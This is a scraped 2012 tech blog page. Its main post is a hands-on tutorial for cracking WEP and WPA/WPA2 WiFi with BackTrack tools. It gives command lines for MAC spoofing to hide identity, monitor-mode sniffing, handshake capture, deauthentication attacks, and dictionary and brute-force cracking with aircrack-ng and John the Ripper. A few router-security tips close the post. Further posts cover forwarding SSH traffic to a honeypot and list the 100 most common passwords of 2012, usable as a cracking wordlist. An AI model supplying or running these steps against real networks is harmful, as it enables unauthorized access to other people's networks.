How to Hack Wifi (and how to avoid being hacked): WEP/WPA/WPA2 | CodeBangers

Standard

From: http://codebangers.com/?p=249

 

This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 Network and then I will give tips on how to avoid getting hacked.

This is important information in our techno-savy culture. If your wireless network is compromised you can be liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other peoples wireless networks.

NOTE: Hacking your neighbors or anyone else’s Wifi without their permission is ILLEGAL. Be smart!

Step 1What you Need

What you Need
i

-A Computer. (A Laptop works best)-A Wireless Card capable of packet injection.
-If your laptop wireless card can’t do packet injection you can purchase a wireless adapter such as the Netgear WG111 v2 for around $8-$12 on eBay.
-A Live installation of BackTrack either on a CD or USB stick.
-BackTrack 5 Can be found Here
-Create a Live USB Install Here

Step 2Hack WEP

Hack WEP
i

WEP is the predecessor of WPA and has been hacked for the past 5+ years yet people continue to use it. With the instructions below we can crack WEP in under 15 minutes.You can crack WEP from the command line but there is an easy GUI interface in backtrack which makes it a much less painful experience for those who are scared of command prompts.
1. Boot into BackTrack

2. Click on the Backtrack applications menu -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (This will open up the GUI interface seen in the picture).

3. Go to the configuration menu and select the wireless interface wlan0
-Click on Enable/Disable Monitor Mode (this will put the wireless card into monitor mode).
-Select the newly created mon0 interface.

4. Now click on the WEP tab at the top of the window.
-Click on “Start sniffing and logging” and leave the terminal open.
-Once the wireless network you want to crack* shows up (it has to be WEP encryption of course) select the WEP Attacks (with clients). *note that the PWR has to be high enough to work so the closer you can get, the better.
-There you click on “Associate with AP using fake auth”, wait a few seconds and click on “ARP request replay”.

5. Once the Data number reaches over 10,000 you are ready to try (if the data is coming fast wait until 20 or 30,000 to be safe) and crack the key, but don’t close any windows yet.
-Go to the cracking tab and click on “Aircrack-ng – Decrypt WEP password” under Wep Cracking.

It will take a few seconds to minutes to crack the password and then you are good to go.

Step 3Hack WPA/WPA2

Hack WPA/WPA2
i

At least WPA and WPA2 are safe right? Wrong. WPA and WPA2 are both crackable but the time it takes to crack depends on the strength of their password.-Boot into BackTrack
-Open up Konsole which is a command line utility built into BackTrack. It is the Black Box in the Lower-Left Hand Corner (See Image).
We will now be entering the following commands into the command line noted by Bold as well as explanations as to what they do:
-The following commands stop the wireless interface so you can change your mac address, this is important because your mac address is a unique identifier so faking one is a good idea if you are accessing a network you don’t have permission to. (which by the way I wholly condemn)

1:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

2:
-Now we will put the airodump-ng tool into monitor mode, this will allow us to see all of the wireless networks around us (See the first Picture).

airodump-ng mon0

Now choose the network you want to hack and take note of the BSSID, and the Channel it is one as well as the ESSID. The PWR has to be fairly high to be able to hack it, this is determined by how close you are to the wireless router. The closer you are, the better.

Once you have chosen the wireless network enter the following into the terminal:
This will write capture packets and put them into the “filename” file, we are trying to capture the handshake between the router and wireless connection which will give us the key we need to crack.

3:
airodump-ng mon0 –channel * –bssid **:**:**:**:**:** -w filename

The following step is optional but is highly recommended as it will speed up the process a great deal.

Once “WPA handshake: **:**:**:**:**:**” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then do step 4.

4:
aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0

What this step (4) does is it deauthorizes a wireless connection and trie to re-establish it so it will generate a new handshake to capture. This step ends once you have captured the handshake.

5:
aircrack-ng –w wordlist.lst -b **:**:**:**:**:** filename.cap

Step 5 is now trying to crack the password in “filename.cap” using a list of words, here called “wordlist.lst” you can download a good 200 million word dictionary here (128MB but unzipped is 800MB).

Your computer has to compute the hash value of every password in that list but a computer can go through those 200 million passwords in 6-12 hours.

6.

If the password isn’t found in the dictionary you can try and brute-force the password with this command: (Note this could take a very long time depending on their password strength).

/pentest/password/jtr/john –stdout –incremental:all | aircrack-ng -b **:**:**:**:**:** -w – filename.cap

Step 4Secure Your Own Wireless Network

Secure Your Own Wireless Network
i

Hopefully you gained some insight into how to not get your own wireless connection hacked:1. Use WPA2 (WPA2-AES) if available and by all means never use WEP.
2. Don’t base your password on a dictionary word. The next section focuses on passwords in general.
3. In your router settings you can usually hide your ESSID (the name of the wireless network) this will add a small layer of security.
4. In your router there is probably a mac-address filtering service where you can specify the mac addresses that are allowed to connect. This will make sure that only your approved devices can connect to your network. (obviously a problem though if you have a guest over and wants to connect to your Wifi).
30894 View(s)

This entry was posted in Hacks, How to on March 20, 2012 by nertblox.
Post navigation← Transforming Nintendo 64 into Handheld Console aka Grape 64Better Textures for Skyrim →
Comments?

SEARCH

Search for:

How to Decrypt, Unpack, and Edit .apk files (Android, Eclipse, APKTOOL) – Easy as Pie

How to install Maxmind’s GeoIP on Ubuntu/Linux for PHP

Easy PHP Calendar that pulls data from MYSQL

Configure HTTPS with Linux

How to install Any Operating System from a Thumbdrive

How to a Print to a Local or Network Printer with PHP and Linux Command Line

How to play your favorite console games online through your browser

Get Youtube Thumbnails with PHP or Html

How to install Pithos Dekstop Client for Pandora

How To: Do a CSS Reset

Speech Recognition with the Raspberry Pi

How to install festival for Linux/Ubuntu

How to fix any Computer

10 of the Most Awesome Windows Shortcuts You Never Knew About

Fix Sound Drivers for Raspberry Pi – Easy

PHP Code for Replacing Characters in a String or Variable

Transforming Nintendo 64 into Handheld Console aka Grape 64

SSH into your Amazon instance with a KeyPair

How to Obtain a Google API Key.

Adding or Subtracting Time to/from MYSQL Formatted Timestamp in PHP

PHP Cookies don’t work on Apple/Mac – Safari and Opera Browsers/iPhone, iPad, iPod Devices – FIXED

How to look at updated access.log or other log files in linux command line

Split PHP String into Multiple Variables Made Easy

How to Setup Apache2 with Virtual Hosts – Easy Tutorial

How to Split an Array into a String with PHP

How to gain Acess to Unprotected Webcams

How to Import a Android Project (.apk file or folders) into Eclipse

Grammatically Correct PHP Title Capitalization Function

How to Install and Setup Apache in Ubuntu

Toggle Keyboard with Javascript for Ipad/Ipod/Iphone or other Mobile Devices

How can I tell what is taking up space on my hard drive?

SOPA Emergency IP list:

How to embed a Flash/Swf File

How to Charge an iPod with fruits.

How to Troll Someone’s Computer

1234567891011121314151617181920212223242526272829303132333435

Runs on WP AA Batteries

545 total views, no views today

Help capture SSH Honeypot details and valid username and passwords used

Standard

Using this post, http://edgis-security.org/honeypot/kippo-01-getting-started/ , I have setup a SSH Honeypot with Kippo.
If you want, you can forward traffic from your own servers to mine and see the results of the SSH capture @ http://info.sethleedy.name/kippo/

Use this in your IPTables to forward your own port 22 traffic to mine @ IP 74.219.241.248 4.49.115.54.

Change ethernet device to match yours.

Remember to save your iptables for after reboot. iptables-save
Also, you better set this: sysctl net.ipv4.ip_forward=1 OR echo “1” > /proc/sys/net/ipv4/ip_forward

You can achive the same forwarding results by using
redir ( http://linux.die.net/man/1/redir )
or
socat ( http://linux.die.net/man/1/socat )
without making use of ip_forward, NAT and masquerading.

975 total views, no views today

HackTalk’s Top 100 Passwords of 2012 | HackTalk

Standard

http://blog.hacktalk.net/hacktalks-top-100-passwords-of-2012/

Here’s my list of Top 100 Passwords of 2012. Note that there are only 99 since the most common password with 24424 hits was blank…

These passwords are ordered from most frequent to least.

123456
111111
123456789
password
123
12345678
000000
123123
welcome
12345
654321
ninja
abc123
1234
1234567
1
123321
qwerty
666666
iloveyou
sunshine
princess
abcd1234
5201314
888888
monkey
michael
aaaaaa
112358
freedom
123456jcow
record_created
password1
writer
record_modified
baseball
0
jcow
shadow
881022
tigger
dragon
computer
alonelypuma
success
jordan
123654
football
whatever
superman
michelle
08416263aaaaaa
159753
06092684
purple
ashley
112233
ginger
1234567890
maggie
daniel
love
justin
jasmine
rainbow
1q2w3e4r
samantha
pepper
121212
jennifer
charlie
333333
family
cookie
acm
babygirl
1a1a1a1b
115599
thomas
joshua
associated
5025578
31415926
william
the
nicole
buster
blessed
314159
money
lovely
destiny
butterfly
brandon
anthony
angels
1qaz2wsx
hunter
crystal

438 total views, no views today